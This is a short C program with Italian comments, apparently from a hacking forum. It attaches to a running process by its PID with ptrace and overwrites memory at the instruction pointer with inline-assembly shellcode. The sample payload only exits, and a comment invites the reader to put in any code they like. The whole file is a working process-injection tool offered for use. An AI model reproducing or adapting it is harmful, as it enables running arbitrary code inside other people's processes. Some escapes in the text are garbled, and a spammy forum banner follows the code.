#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <string.h>
//qui è presente il codice che compilato andremo a inserire nella memoria
//del processo attacato
asm(
"start:n"
"nopn"
//scrivete quello che volete
"movl $1,%eaxn"
"movl $123,%ebxn"
"int $0x80n"
//shellcode end
"end:n"
"nopn"
);
//ritorna un puntatore alla prima istruzione dello shellcode
char *getP(void){
asm("movl $start,%eaxn");
}
//ritorna la dimensione dello shellcode
int getS(void){
asm("movl $(end-start),%eaxn");
}
int main(int ar, char** av)
{
if (ar != 2){
printf("[-] %s <pid>n", av[0]);
exit(0);
}
pid_t pid;
int status, i, pl;
struct user_regs_struct regs;
char s[1024];
//prendiamo il pid del processo che andremo ad attacare
if (sscanf(av[1], "%d", &pid) != 1){
printf("[-] I cant use pid=%sn", av[1]);
exit(1);
}
//settiamo a 0 il vettore s e scriviamo lo shellcode
memset(s, 0x00, 1024);
memcpy(s, getP(), getS());
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0){
perror ("[-] ATTACH: ");
exit(3);
}
printf("[+] ptrace attachn");
wait(&status);
//get the register
if (ptrace(PTRACE_GETREGS, pid, NULL, ®s) < 0){
perror("[-] GETREGS: ");
exit(4);
}
printf("[+] ptrace getregsn");
printf("[!] Shellcode = 0x");
for(i=0; i < getS(); i += 4){
memcpy(&pl, s+i, 4);
printf("%x", pl);
//insert the shellcode into the memory
if (ptrace(PTRACE_POKEDATA, pid, regs.eip + i, pl) < 0){
perror("POKETDATA:");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
exit(2);
}
}
if (ptrace(PTRACE_SETREGS, pid, NULL, ®s) < 0){
perror("[-] SETREGS: ");
exit(5);
}
printf("n[+] setregsn");
ptrace (PTRACE_CONT, pid, NULL, NULL);
ptrace (PTRACE_DETACH, pid, NULL, NULL);
}
![ALLmania [computer grafica musica moda P2P emule dc++ hacker msn rubare password hard xxx hentai porno sesso culo fica pompino]](http://img.forumfree.net/index_file/spacer.gif)
